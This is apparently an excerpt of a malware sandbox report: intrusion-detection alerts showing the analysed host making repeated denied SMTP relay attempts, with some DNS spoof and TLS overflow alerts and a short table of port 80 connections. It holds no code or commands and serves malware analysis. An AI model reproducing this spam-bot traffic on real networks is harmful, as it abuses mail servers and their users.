08/24/21-08:50:10.033732	TCP	567	POLICY SMTP relaying denied	25	49734	104.47.58.161	192.168.2.5
08/24/21-08:50:10.090208	TCP	567	POLICY SMTP relaying denied	25	49735	104.47.57.161	192.168.2.5
08/24/21-08:50:10.561387	TCP	567	POLICY SMTP relaying denied	25	49745	104.47.74.33	192.168.2.5
08/24/21-08:50:10.568690	TCP	567	POLICY SMTP relaying denied	25	49746	104.47.74.33	192.168.2.5
08/24/21-08:50:11.203344	TCP	567	POLICY SMTP relaying denied	25	49747	104.47.57.161	192.168.2.5
08/24/21-08:50:11.205660	TCP	567	POLICY SMTP relaying denied	25	49748	104.47.57.161	192.168.2.5
08/24/21-08:50:11.820571	TCP	567	POLICY SMTP relaying denied	25	49750	104.47.57.161	192.168.2.5
08/24/21-08:50:11.998089	TCP	567	POLICY SMTP relaying denied	25	49751	104.47.66.33	192.168.2.5
08/24/21-08:50:12.041225	TCP	567	POLICY SMTP relaying denied	25	49752	104.47.18.161	192.168.2.5
08/24/21-08:50:12.606375	TCP	567	POLICY SMTP relaying denied	25	49754	104.47.57.161	192.168.2.5
08/24/21-08:50:12.622263	TCP	567	POLICY SMTP relaying denied	25	49753	104.47.57.161	192.168.2.5
08/24/21-08:50:13.196685	TCP	567	POLICY SMTP relaying denied	25	49757	104.47.74.33	192.168.2.5
08/24/21-08:50:13.250617	TCP	567	POLICY SMTP relaying denied	25	49756	104.47.57.161	192.168.2.5
08/24/21-08:50:13.784125	TCP	567	POLICY SMTP relaying denied	25	49759	104.47.74.33	192.168.2.5
08/24/21-08:50:13.784575	TCP	567	POLICY SMTP relaying denied	25	49760	104.47.74.33	192.168.2.5
08/24/21-08:50:15.488254	TCP	567	POLICY SMTP relaying denied	25	49763	104.47.74.33	192.168.2.5
08/24/21-08:50:15.507586	TCP	567	POLICY SMTP relaying denied	25	49764	104.47.74.33	192.168.2.5
08/24/21-08:50:15.722503	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
08/24/21-08:50:16.263190	TCP	567	POLICY SMTP relaying denied	25	49768	104.47.56.161	192.168.2.5
08/24/21-08:50:16.277379	TCP	567	POLICY SMTP relaying denied	25	49767	104.47.56.161	192.168.2.5
08/24/21-08:50:16.954514	TCP	567	POLICY SMTP relaying denied	25	49771	104.47.57.161	192.168.2.5
08/24/21-08:50:16.960977	TCP	567	POLICY SMTP relaying denied	25	49770	104.47.57.161	192.168.2.5
08/24/21-08:50:17.553076	TCP	567	POLICY SMTP relaying denied	25	49774	104.47.57.161	192.168.2.5
08/24/21-08:50:17.591017	TCP	567	POLICY SMTP relaying denied	25	49775	104.47.57.161	192.168.2.5
08/24/21-08:50:17.880236	TCP	567	POLICY SMTP relaying denied	25	49778	104.47.18.161	192.168.2.5
08/24/21-08:50:18.075583	TCP	567	POLICY SMTP relaying denied	25	49779	104.47.18.161	192.168.2.5
08/24/21-08:50:18.159231	TCP	567	POLICY SMTP relaying denied	25	49777	104.47.57.161	192.168.2.5
08/24/21-08:50:18.720404	TCP	567	POLICY SMTP relaying denied	25	49782	104.47.57.161	192.168.2.5
08/24/21-08:50:18.733572	TCP	567	POLICY SMTP relaying denied	25	49781	104.47.57.161	192.168.2.5
08/24/21-08:50:19.330058	TCP	567	POLICY SMTP relaying denied	25	49783	104.47.57.161	192.168.2.5
08/24/21-08:50:19.346240	TCP	567	POLICY SMTP relaying denied	25	49784	104.47.57.161	192.168.2.5
08/24/21-08:50:20.054792	TCP	567	POLICY SMTP relaying denied	25	49786	104.47.57.161	192.168.2.5
08/24/21-08:50:20.066118	TCP	567	POLICY SMTP relaying denied	25	49788	104.47.57.161	192.168.2.5
08/24/21-08:50:20.788438	TCP	567	POLICY SMTP relaying denied	25	49790	104.47.57.161	192.168.2.5
08/24/21-08:50:20.801155	TCP	567	POLICY SMTP relaying denied	25	49789	104.47.57.161	192.168.2.5
08/24/21-08:50:21.617194	TCP	567	POLICY SMTP relaying denied	25	49792	104.47.57.161	192.168.2.5
08/24/21-08:50:21.970674	TCP	567	POLICY SMTP relaying denied	25	49791	104.47.57.161	192.168.2.5
08/24/21-08:50:23.075782	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
08/24/21-08:50:23.268476	TCP	567	POLICY SMTP relaying denied	25	49796	104.47.18.225	192.168.2.5
08/24/21-08:50:23.300908	TCP	567	POLICY SMTP relaying denied	25	49793	104.47.74.33	192.168.2.5
08/24/21-08:50:23.513407	TCP	567	POLICY SMTP relaying denied	25	49799	104.47.18.97	192.168.2.5
08/24/21-08:50:23.717773	TCP	567	POLICY SMTP relaying denied	25	49800	104.47.18.97	192.168.2.5
08/24/21-08:50:23.791501	TCP	567	POLICY SMTP relaying denied	25	49798	104.47.74.33	192.168.2.5
08/24/21-08:50:23.940593	TCP	567	POLICY SMTP relaying denied	25	49801	104.47.18.97	192.168.2.5
08/24/21-08:50:24.342821	TCP	567	POLICY SMTP relaying denied	25	49802	104.47.74.33	192.168.2.5
08/24/21-08:50:24.483755	TCP	567	POLICY SMTP relaying denied	25	49803	104.47.74.33	192.168.2.5
08/24/21-08:50:24.881237	TCP	567	POLICY SMTP relaying denied	25	49804	104.47.74.33	192.168.2.5
08/24/21-08:50:25.031170	TCP	567	POLICY SMTP relaying denied	25	49806	104.47.74.33	192.168.2.5
08/24/21-08:50:25.395806	TCP	567	POLICY SMTP relaying denied	25	49808	104.47.74.33	192.168.2.5
08/24/21-08:50:25.544480	TCP	567	POLICY SMTP relaying denied	25	49809	104.47.74.33	192.168.2.5
08/24/21-08:50:25.734786	TCP	567	POLICY SMTP relaying denied	25	49811	104.47.18.225	192.168.2.5
08/24/21-08:50:25.734805	TCP	567	POLICY SMTP relaying denied	25	49812	104.47.18.225	192.168.2.5
08/24/21-08:50:26.241280	TCP	567	POLICY SMTP relaying denied	25	49814	104.47.74.33	192.168.2.5
08/24/21-08:50:26.248914	TCP	567	POLICY SMTP relaying denied	25	49813	104.47.74.33	192.168.2.5
08/24/21-08:50:26.661743	TCP	567	POLICY SMTP relaying denied	25	49815	104.47.13.33	192.168.2.5
08/24/21-08:50:26.670260	TCP	567	POLICY SMTP relaying denied	25	49816	104.47.13.33	192.168.2.5
08/24/21-08:50:26.846061	TCP	567	POLICY SMTP relaying denied	25	49820	104.47.18.225	192.168.2.5
08/24/21-08:50:26.849484	TCP	567	POLICY SMTP relaying denied	25	49819	104.47.9.33	192.168.2.5
08/24/21-08:50:27.368855	TCP	567	POLICY SMTP relaying denied	25	49822	104.47.74.33	192.168.2.5
08/24/21-08:50:27.372117	TCP	567	POLICY SMTP relaying denied	25	49821	104.47.74.33	192.168.2.5
08/24/21-08:50:27.884341	TCP	567	POLICY SMTP relaying denied	25	49825	104.47.74.33	192.168.2.5
08/24/21-08:50:27.888515	TCP	567	POLICY SMTP relaying denied	25	49824	104.47.74.33	192.168.2.5
08/24/21-08:50:28.393421	TCP	567	POLICY SMTP relaying denied	25	49827	104.47.74.33	192.168.2.5
08/24/21-08:50:28.401333	TCP	567	POLICY SMTP relaying denied	25	49826	104.47.74.33	192.168.2.5
08/24/21-08:50:28.601681	TCP	567	POLICY SMTP relaying denied	25	49828	104.47.18.225	192.168.2.5
08/24/21-08:50:29.037030	TCP	567	POLICY SMTP relaying denied	25	49829	104.47.59.161	192.168.2.5
08/24/21-08:50:29.094660	TCP	567	POLICY SMTP relaying denied	25	49830	104.47.74.33	192.168.2.5
08/24/21-08:50:29.213557	TCP	567	POLICY SMTP relaying denied	25	49834	104.47.18.225	192.168.2.5
08/24/21-08:50:29.293579	TCP	567	POLICY SMTP relaying denied	25	49835	104.47.18.225	192.168.2.5
08/24/21-08:50:29.393836	TCP	567	POLICY SMTP relaying denied	25	49836	104.47.18.225	192.168.2.5
08/24/21-08:50:29.850584	TCP	567	POLICY SMTP relaying denied	25	49837	104.47.74.33	192.168.2.5
08/24/21-08:50:29.880627	TCP	567	POLICY SMTP relaying denied	25	49838	104.47.74.33	192.168.2.5
08/24/21-08:50:30.103813	TCP	567	POLICY SMTP relaying denied	25	49842	104.47.14.33	192.168.2.5
08/24/21-08:50:30.351045	TCP	567	POLICY SMTP relaying denied	25	49843	104.47.13.33	192.168.2.5
08/24/21-08:50:30.356396	TCP	567	POLICY SMTP relaying denied	25	49841	104.47.74.33	192.168.2.5
08/24/21-08:50:30.862631	TCP	567	POLICY SMTP relaying denied	25	49844	104.47.74.33	192.168.2.5
08/24/21-08:50:30.873192	TCP	567	POLICY SMTP relaying denied	25	49845	104.47.74.33	192.168.2.5
08/24/21-08:50:31.070018	TCP	567	POLICY SMTP relaying denied	25	49847	104.47.18.97	192.168.2.5
08/24/21-08:50:31.388026	TCP	567	POLICY SMTP relaying denied	25	49846	104.47.74.33	192.168.2.5
08/24/21-08:50:31.577118	TCP	567	POLICY SMTP relaying denied	25	49848	104.47.74.33	192.168.2.5
08/24/21-08:50:31.767252	TCP	567	POLICY SMTP relaying denied	25	49850	104.47.18.225	192.168.2.5
08/24/21-08:50:31.912315	TCP	567	POLICY SMTP relaying denied	25	49849	104.47.74.33	192.168.2.5
08/24/21-08:50:31.950162	TCP	567	POLICY SMTP relaying denied	25	49851	104.47.14.33	192.168.2.5
08/24/21-08:50:32.189592	TCP	567	POLICY SMTP relaying denied	25	49852	104.47.10.33	192.168.2.5
08/24/21-08:50:32.201761	TCP	567	POLICY SMTP relaying denied	25	49853	104.47.10.33	192.168.2.5
08/24/21-08:50:32.226581	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62623	8.8.8.8	192.168.2.5
08/24/21-08:50:32.459542	TCP	567	POLICY SMTP relaying denied	25	49856	104.47.10.33	192.168.2.5
08/24/21-08:50:32.469598	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	64289	8.8.8.8	192.168.2.5
08/24/21-08:50:32.543368	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	62707	8.8.8.8	192.168.2.5
08/24/21-08:50:32.703330	TCP	567	POLICY SMTP relaying denied	25	49857	104.47.74.33	192.168.2.5
08/24/21-08:50:32.730554	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	60328	8.8.8.8	192.168.2.5
08/24/21-08:50:32.751420	TCP	567	POLICY SMTP relaying denied	25	49859	104.47.10.33	192.168.2.5
08/24/21-08:50:32.961006	TCP	567	POLICY SMTP relaying denied	25	49863	104.47.14.33	192.168.2.5
08/24/21-08:50:33.218113	TCP	567	POLICY SMTP relaying denied	25	49864	104.47.10.33	192.168.2.5
08/24/21-08:50:33.247322	TCP	567	POLICY SMTP relaying denied	25	49862	104.47.74.33	192.168.2.5
08/24/21-08:50:33.508554	TCP	567	POLICY SMTP relaying denied	25	49866	104.47.10.33	192.168.2.5
08/24/21-08:50:33.756516	TCP	567	POLICY SMTP relaying denied	25	49868	104.47.12.33	192.168.2.5
08/24/21-08:50:33.883144	TCP	567	POLICY SMTP relaying denied	25	49867	104.47.73.33	192.168.2.5
08/24/21-08:50:33.965603	TCP	567	POLICY SMTP relaying denied	25	49869	104.47.18.225	192.168.2.5
08/24/21-08:50:34.068457	TCP	567	POLICY SMTP relaying denied	25	49870	104.47.18.225	192.168.2.5
08/24/21-08:50:34.162304	TCP	567	POLICY SMTP relaying denied	25	49871	104.47.18.225	192.168.2.5
08/24/21-08:50:34.241393	TCP	567	POLICY SMTP relaying denied	25	49872	104.47.18.97	192.168.2.5
08/24/21-08:50:34.345500	TCP	567	POLICY SMTP relaying denied	25	49873	104.47.18.225	192.168.2.5
08/24/21-08:50:34.427250	TCP	567	POLICY SMTP relaying denied	25	49874	104.47.18.225	192.168.2.5
08/24/21-08:50:34.534982	TCP	567	POLICY SMTP relaying denied	25	49875	104.47.18.225	192.168.2.5
08/24/21-08:50:34.723482	TCP	567	POLICY SMTP relaying denied	25	49876	104.47.12.33	192.168.2.5
08/24/21-08:50:34.725391	TCP	567	POLICY SMTP relaying denied	25	49877	104.47.9.33	192.168.2.5
08/24/21-08:50:34.896094	TCP	567	POLICY SMTP relaying denied	25	49878	104.47.18.225	192.168.2.5
08/24/21-08:50:34.896778	TCP	567	POLICY SMTP relaying denied	25	49879	104.47.18.225	192.168.2.5
08/24/21-08:50:35.098783	TCP	567	POLICY SMTP relaying denied	25	49881	104.47.18.225	192.168.2.5
08/24/21-08:50:35.106361	TCP	567	POLICY SMTP relaying denied	25	49880	104.47.18.225	192.168.2.5
08/24/21-08:50:35.292976	TCP	567	POLICY SMTP relaying denied	25	49883	104.47.18.225	192.168.2.5
08/24/21-08:50:35.308469	TCP	567	POLICY SMTP relaying denied	25	49884	104.47.18.225	192.168.2.5
08/24/21-08:50:35.498803	TCP	567	POLICY SMTP relaying denied	25	49885	104.47.18.225	192.168.2.5
08/24/21-08:50:35.502852	TCP	567	POLICY SMTP relaying denied	25	49886	104.47.18.225	192.168.2.5
08/24/21-08:50:35.779571	TCP	567	POLICY SMTP relaying denied	25	49889	104.47.12.33	192.168.2.5
08/24/21-08:50:35.779850	TCP	567	POLICY SMTP relaying denied	25	49890	104.47.12.33	192.168.2.5
08/24/21-08:50:35.985897	TCP	567	POLICY SMTP relaying denied	25	49893	104.47.18.97	192.168.2.5
08/24/21-08:50:35.985952	TCP	567	POLICY SMTP relaying denied	25	49894	104.47.18.97	192.168.2.5
08/24/21-08:50:36.181512	TCP	567	POLICY SMTP relaying denied	25	49895	104.47.18.225	192.168.2.5
08/24/21-08:50:36.193107	TCP	567	POLICY SMTP relaying denied	25	49896	104.47.18.225	192.168.2.5
08/24/21-08:50:36.458898	TCP	567	POLICY SMTP relaying denied	25	49897	104.47.18.225	192.168.2.5
08/24/21-08:50:36.464071	TCP	567	POLICY SMTP relaying denied	25	49898	104.47.4.33	192.168.2.5
08/24/21-08:50:36.645793	TCP	567	POLICY SMTP relaying denied	25	49900	104.47.14.33	192.168.2.5
08/24/21-08:50:36.836931	TCP	567	POLICY SMTP relaying denied	25	49902	104.47.18.225	192.168.2.5
08/24/21-08:50:37.132696	TCP	567	POLICY SMTP relaying denied	25	49903	104.47.12.33	192.168.2.5
08/24/21-08:50:37.177553	TCP	567	POLICY SMTP relaying denied	25	49899	104.47.73.33	192.168.2.5
08/24/21-08:50:37.384527	TCP	567	POLICY SMTP relaying denied	25	49905	104.47.18.225	192.168.2.5
08/24/21-08:50:37.608370	TCP	567	POLICY SMTP relaying denied	25	49906	104.47.18.225	192.168.2.5
08/24/21-08:50:37.688388	TCP	567	POLICY SMTP relaying denied	25	49904	104.47.51.33	192.168.2.5
08/24/21-08:50:37.795816	TCP	567	POLICY SMTP relaying denied	25	49907	104.47.18.225	192.168.2.5
08/24/21-08:50:37.954518	TCP	567	POLICY SMTP relaying denied	25	49908	104.47.18.225	192.168.2.5
08/24/21-08:50:38.094167	TCP	567	POLICY SMTP relaying denied	25	49909	104.47.12.33	192.168.2.5
08/24/21-08:50:38.225526	TCP	567	POLICY SMTP relaying denied	25	49911	104.47.18.225	192.168.2.5
08/24/21-08:50:38.337845	TCP	567	POLICY SMTP relaying denied	25	49912	104.47.18.225	192.168.2.5
08/24/21-08:50:38.527707	TCP	567	POLICY SMTP relaying denied	25	49913	104.47.18.225	192.168.2.5
08/24/21-08:50:38.599106	TCP	567	POLICY SMTP relaying denied	25	49914	104.47.18.97	192.168.2.5
08/24/21-08:50:38.784484	TCP	567	POLICY SMTP relaying denied	25	49916	104.47.18.225	192.168.2.5
08/24/21-08:50:38.792164	TCP	567	POLICY SMTP relaying denied	25	49915	104.47.18.225	192.168.2.5
08/24/21-08:50:39.054791	TCP	567	POLICY SMTP relaying denied	25	49918	104.47.18.225	192.168.2.5
08/24/21-08:50:39.054821	TCP	567	POLICY SMTP relaying denied	25	49917	104.47.18.225	192.168.2.5
08/24/21-08:50:39.252743	TCP	567	POLICY SMTP relaying denied	25	49920	104.47.18.225	192.168.2.5
08/24/21-08:50:39.253633	TCP	567	POLICY SMTP relaying denied	25	49921	104.47.18.225	192.168.2.5
08/24/21-08:50:39.473851	TCP	567	POLICY SMTP relaying denied	25	49922	104.47.18.225	192.168.2.5
08/24/21-08:50:39.474768	TCP	567	POLICY SMTP relaying denied	25	49923	104.47.14.33	192.168.2.5
08/24/21-08:50:39.705284	TCP	567	POLICY SMTP relaying denied	25	49925	104.47.18.225	192.168.2.5
08/24/21-08:50:40.011434	TCP	567	POLICY SMTP relaying denied	25	49926	104.47.18.225	192.168.2.5
08/24/21-08:50:40.117743	TCP	567	POLICY SMTP relaying denied	25	49924	104.47.59.161	192.168.2.5
08/24/21-08:50:40.302450	TCP	567	POLICY SMTP relaying denied	25	49927	104.47.12.33	192.168.2.5
08/24/21-08:50:40.411535	TCP	567	POLICY SMTP relaying denied	25	49928	104.47.12.33	192.168.2.5
08/24/21-08:50:40.889471	TCP	567	POLICY SMTP relaying denied	25	49930	104.47.10.33	192.168.2.5
08/24/21-08:50:40.912904	TCP	567	POLICY SMTP relaying denied	25	49931	104.47.18.225	192.168.2.5
08/24/21-08:50:41.228628	TCP	567	POLICY SMTP relaying denied	25	49934	104.47.14.33	192.168.2.5
08/24/21-08:50:41.308090	TCP	567	POLICY SMTP relaying denied	25	49933	104.47.12.33	192.168.2.5
08/24/21-08:50:41.527470	TCP	567	POLICY SMTP relaying denied	25	49936	104.47.18.225	192.168.2.5
08/24/21-08:50:41.742679	TCP	567	POLICY SMTP relaying denied	25	49937	104.47.12.33	192.168.2.5
08/24/21-08:50:42.479332	TCP	567	POLICY SMTP relaying denied	25	49939	104.47.18.225	192.168.2.5
08/24/21-08:50:42.480783	TCP	567	POLICY SMTP relaying denied	25	49938	104.47.18.225	192.168.2.5
08/24/21-08:50:42.945900	TCP	567	POLICY SMTP relaying denied	25	49941	104.47.14.33	192.168.2.5
08/24/21-08:50:43.115740	TCP	567	POLICY SMTP relaying denied	25	49943	104.47.18.225	192.168.2.5
08/24/21-08:50:44.416643	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
08/24/21-08:50:44.560770	TCP	567	POLICY SMTP relaying denied	25	49946	104.47.18.225	192.168.2.5
08/24/21-08:50:44.568834	TCP	567	POLICY SMTP relaying denied	25	49947	104.47.18.225	192.168.2.5
08/24/21-08:50:44.910449	TCP	567	POLICY SMTP relaying denied	25	49948	104.47.14.33	192.168.2.5
08/24/21-08:50:45.049416	TCP	567	POLICY SMTP relaying denied	25	49950	104.47.12.33	192.168.2.5
08/24/21-08:50:45.223563	TCP	567	POLICY SMTP relaying denied	25	49951	104.47.18.225	192.168.2.5
08/24/21-08:50:45.451499	TCP	567	POLICY SMTP relaying denied	25	49952	104.47.22.161	192.168.2.5
08/24/21-08:50:45.648832	TCP	567	POLICY SMTP relaying denied	25	49953	104.47.10.33	192.168.2.5
08/24/21-08:50:45.757357	TCP	567	POLICY SMTP relaying denied	25	49954	104.47.10.33	192.168.2.5
08/24/21-08:50:45.897508	TCP	567	POLICY SMTP relaying denied	25	49955	104.47.14.33	192.168.2.5
08/24/21-08:50:46.013602	TCP	567	POLICY SMTP relaying denied	25	49956	104.47.18.97	192.168.2.5
08/24/21-08:50:46.152340	TCP	567	POLICY SMTP relaying denied	25	49957	104.47.18.225	192.168.2.5
08/24/21-08:50:46.219053	TCP	567	POLICY SMTP relaying denied	25	49958	104.47.18.225	192.168.2.5
08/24/21-08:50:46.364762	TCP	567	POLICY SMTP relaying denied	25	49959	104.47.14.33	192.168.2.5
08/24/21-08:50:46.507899	TCP	567	POLICY SMTP relaying denied	25	49960	104.47.12.33	192.168.2.5
08/24/21-08:50:46.562129	TCP	567	POLICY SMTP relaying denied	25	49961	104.47.18.225	192.168.2.5
08/24/21-08:50:46.788212	TCP	567	POLICY SMTP relaying denied	25	49963	104.47.12.33	192.168.2.5
08/24/21-08:50:46.797656	TCP	567	POLICY SMTP relaying denied	25	49962	104.47.12.33	192.168.2.5
08/24/21-08:50:47.000709	TCP	567	POLICY SMTP relaying denied	25	49967	104.47.18.225	192.168.2.5
08/24/21-08:50:47.001904	TCP	567	POLICY SMTP relaying denied	25	49966	104.47.14.33	192.168.2.5
08/24/21-08:50:47.219797	TCP	567	POLICY SMTP relaying denied	25	49971	104.47.14.33	192.168.2.5
08/24/21-08:50:47.298799	TCP	567	POLICY SMTP relaying denied	25	49969	104.47.12.33	192.168.2.5
08/24/21-08:50:47.484710	TCP	567	POLICY SMTP relaying denied	25	49974	104.47.12.33	192.168.2.5
08/24/21-08:50:47.507040	TCP	567	POLICY SMTP relaying denied	25	49977	104.47.14.33	192.168.2.5
08/24/21-08:50:47.674406	TCP	567	POLICY SMTP relaying denied	25	49980	104.47.18.225	192.168.2.5
08/24/21-08:50:47.681194	TCP	567	POLICY SMTP relaying denied	25	49979	104.47.18.225	192.168.2.5
08/24/21-08:50:47.729860	TCP	2515	WEB-MISC PCT Client_Hello overflow attempt	49973	443	192.168.2.5	216.58.215.228
08/24/21-08:50:47.993574	TCP	567	POLICY SMTP relaying denied	25	49983	104.47.12.33	192.168.2.5
08/24/21-08:50:47.993714	TCP	567	POLICY SMTP relaying denied	25	49984	104.47.12.33	192.168.2.5
08/24/21-08:50:48.238883	TCP	567	POLICY SMTP relaying denied	25	49985	104.47.18.97	192.168.2.5
08/24/21-08:50:48.245812	TCP	567	POLICY SMTP relaying denied	25	49986	104.47.18.97	192.168.2.5
08/24/21-08:50:48.446208	TCP	567	POLICY SMTP relaying denied	25	49988	104.47.18.225	192.168.2.5
08/24/21-08:50:48.536300	TCP	567	POLICY SMTP relaying denied	25	49989	104.47.18.225	192.168.2.5
08/24/21-08:50:48.674165	TCP	567	POLICY SMTP relaying denied	25	49990	104.47.18.225	192.168.2.5
08/24/21-08:50:48.678122	TCP	567	POLICY SMTP relaying denied	25	49991	104.47.18.225	192.168.2.5
08/24/21-08:50:48.878467	TCP	567	POLICY SMTP relaying denied	25	49993	104.47.18.225	192.168.2.5
08/24/21-08:50:48.879144	TCP	567	POLICY SMTP relaying denied	25	49992	104.47.18.225	192.168.2.5
08/24/21-08:50:49.085943	TCP	567	POLICY SMTP relaying denied	25	49995	104.47.18.97	192.168.2.5
08/24/21-08:50:49.295311	TCP	567	POLICY SMTP relaying denied	25	49997	104.47.18.97	192.168.2.5
08/24/21-08:50:49.511648	TCP	567	POLICY SMTP relaying denied	25	49998	104.47.18.225	192.168.2.5
08/24/21-08:50:49.651185	TCP	567	POLICY SMTP relaying denied	25	49996	104.47.56.161	192.168.2.5
08/24/21-08:50:49.821857	TCP	567	POLICY SMTP relaying denied	25	50000	104.47.22.161	192.168.2.5
08/24/21-08:50:49.831845	TCP	567	POLICY SMTP relaying denied	25	49976	125.209.222.14	192.168.2.5
08/24/21-08:50:49.852001	TCP	567	POLICY SMTP relaying denied	25	50001	104.47.18.225	192.168.2.5
08/24/21-08:50:50.108625	TCP	567	POLICY SMTP relaying denied	25	50004	104.47.18.225	192.168.2.5
08/24/21-08:50:50.193312	TCP	567	POLICY SMTP relaying denied	25	50003	104.47.12.33	192.168.2.5
08/24/21-08:50:50.952217	TCP	567	POLICY SMTP relaying denied	25	50005	104.47.73.161	192.168.2.5
08/24/21-08:50:50.965343	TCP	567	POLICY SMTP relaying denied	25	50006	104.47.73.161	192.168.2.5
08/24/21-08:50:51.212308	TCP	567	POLICY SMTP relaying denied	25	50011	104.47.12.33	192.168.2.5
08/24/21-08:50:51.223515	TCP	567	POLICY SMTP relaying denied	25	50010	104.47.22.161	192.168.2.5
08/24/21-08:50:51.476512	TCP	567	POLICY SMTP relaying denied	25	50014	104.47.12.33	192.168.2.5
08/24/21-08:50:51.490382	TCP	567	POLICY SMTP relaying denied	25	50013	104.47.12.33	192.168.2.5
08/24/21-08:50:51.701324	TCP	567	POLICY SMTP relaying denied	25	50020	104.47.4.33	192.168.2.5
08/24/21-08:50:51.770407	TCP	567	POLICY SMTP relaying denied	25	50021	104.47.12.33	192.168.2.5
08/24/21-08:50:52.484436	TCP	567	POLICY SMTP relaying denied	25	50025	104.47.73.161	192.168.2.5
08/24/21-08:50:52.500299	TCP	567	POLICY SMTP relaying denied	25	50026	104.47.73.161	192.168.2.5
08/24/21-08:50:52.763151	TCP	567	POLICY SMTP relaying denied	25	50032	104.47.12.33	192.168.2.5
08/24/21-08:50:52.767386	TCP	567	POLICY SMTP relaying denied	25	50033	104.47.12.33	192.168.2.5
08/24/21-08:50:53.010929	TCP	567	POLICY SMTP relaying denied	25	50034	104.47.12.33	192.168.2.5
08/24/21-08:50:53.068474	TCP	567	POLICY SMTP relaying denied	25	50035	104.47.22.161	192.168.2.5
08/24/21-08:50:53.278145	TCP	567	POLICY SMTP relaying denied	25	50036	104.47.12.33	192.168.2.5
08/24/21-08:50:53.287632	TCP	567	POLICY SMTP relaying denied	25	50037	104.47.12.33	192.168.2.5
08/24/21-08:50:53.547405	TCP	567	POLICY SMTP relaying denied	25	50038	104.47.12.33	192.168.2.5
08/24/21-08:50:53.560215	TCP	567	POLICY SMTP relaying denied	25	50039	104.47.22.161	192.168.2.5
08/24/21-08:50:53.817397	TCP	567	POLICY SMTP relaying denied	25	50041	104.47.12.33	192.168.2.5
08/24/21-08:50:53.821767	TCP	567	POLICY SMTP relaying denied	25	50040	104.47.12.33	192.168.2.5
08/24/21-08:50:54.600663	TCP	567	POLICY SMTP relaying denied	25	50044	104.47.73.161	192.168.2.5
08/24/21-08:50:54.614523	TCP	567	POLICY SMTP relaying denied	25	50043	104.47.73.161	192.168.2.5
08/24/21-08:50:55.032424	TCP	567	POLICY SMTP relaying denied	25	50052	104.47.12.33	192.168.2.5
08/24/21-08:50:55.052508	TCP	567	POLICY SMTP relaying denied	25	50051	104.47.12.33	192.168.2.5
08/24/21-08:50:55.358298	TCP	567	POLICY SMTP relaying denied	25	50056	104.47.12.33	192.168.2.5
08/24/21-08:50:55.364932	TCP	567	POLICY SMTP relaying denied	25	50055	104.47.12.33	192.168.2.5
08/24/21-08:50:55.575250	TCP	567	POLICY SMTP relaying denied	25	50058	104.47.18.97	192.168.2.5
08/24/21-08:50:55.773195	TCP	567	POLICY SMTP relaying denied	25	50059	104.47.18.97	192.168.2.5
08/24/21-08:50:56.088492	TCP	567	POLICY SMTP relaying denied	25	50060	104.47.12.33	192.168.2.5
08/24/21-08:50:56.145713	TCP	567	POLICY SMTP relaying denied	25	50057	104.47.73.161	192.168.2.5
08/24/21-08:50:56.376670	TCP	567	POLICY SMTP relaying denied	25	50064	104.47.18.225	192.168.2.5
08/24/21-08:50:56.389642	TCP	567	POLICY SMTP relaying denied	25	50062	104.47.12.33	192.168.2.5
08/24/21-08:50:56.700432	TCP	567	POLICY SMTP relaying denied	25	50066	104.47.12.33	192.168.2.5
08/24/21-08:50:56.710038	TCP	567	POLICY SMTP relaying denied	25	50065	104.47.12.33	192.168.2.5
08/24/21-08:50:57.337759	TCP	567	POLICY SMTP relaying denied	25	50071	104.47.73.33	192.168.2.5
08/24/21-08:50:57.475840	TCP	567	POLICY SMTP relaying denied	25	50072	104.47.56.161	192.168.2.5
08/24/21-08:50:57.751418	TCP	567	POLICY SMTP relaying denied	25	50084	104.47.12.33	192.168.2.5
08/24/21-08:50:58.093746	TCP	567	POLICY SMTP relaying denied	25	50086	104.47.12.33	192.168.2.5
08/24/21-08:50:58.112630	TCP	567	POLICY SMTP relaying denied	25	50081	104.47.73.161	192.168.2.5
08/24/21-08:50:58.468377	TCP	567	POLICY SMTP relaying denied	25	50089	104.47.12.33	192.168.2.5
08/24/21-08:50:58.757298	TCP	567	POLICY SMTP relaying denied	25	50090	104.47.18.97	192.168.2.5
08/24/21-08:50:58.950945	TCP	567	POLICY SMTP relaying denied	25	50088	104.47.56.161	192.168.2.5
08/24/21-08:50:59.044390	TCP	567	POLICY SMTP relaying denied	25	50091	104.47.12.33	192.168.2.5
08/24/21-08:50:59.159704	TCP	567	POLICY SMTP relaying denied	25	50092	104.47.18.97	192.168.2.5
08/24/21-08:50:59.358847	TCP	567	POLICY SMTP relaying denied	25	50093	104.47.12.33	192.168.2.5
08/24/21-08:50:59.422198	TCP	567	POLICY SMTP relaying denied	25	50095	104.47.12.33	192.168.2.5
08/24/21-08:51:00.203755	TCP	567	POLICY SMTP relaying denied	25	50097	104.47.73.161	192.168.2.5
08/24/21-08:51:00.216948	TCP	567	POLICY SMTP relaying denied	25	50096	104.47.73.161	192.168.2.5
08/24/21-08:51:00.658413	TCP	567	POLICY SMTP relaying denied	25	50103	104.47.12.33	192.168.2.5
08/24/21-08:51:00.684228	TCP	567	POLICY SMTP relaying denied	25	50104	104.47.12.33	192.168.2.5
08/24/21-08:51:02.165095	TCP	567	POLICY SMTP relaying denied	25	50108	104.47.73.161	192.168.2.5
08/24/21-08:51:02.341091	TCP	567	POLICY SMTP relaying denied	25	50107	104.47.73.161	192.168.2.5
08/24/21-08:51:03.559614	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
08/24/21-08:51:03.658545	TCP	567	POLICY SMTP relaying denied	25	50115	104.47.18.161	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 24, 2021 08:48:59.505918980 CEST	49710	80	192.168.2.5	95.213.224.6
Aug 24, 2021 08:49:02.510806084 CEST	49710	80	192.168.2.5	95.213.224.6
Aug 24, 2021 08:49:08.511056900 CEST	49710	80	192.168.2.5	95.213.224.6
Aug 24, 2021 08:49:11.453248978 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.475436926 CEST	80	49712	212.224.105.79	192.168.2.5
Aug 24, 2021 08:49:11.475545883 CEST	49712	80	192.168.2.5	212.224.105.79
Aug 24, 2021 08:49:11.475729942 CEST	49712	80	192.168.2.5	212.224.105.79
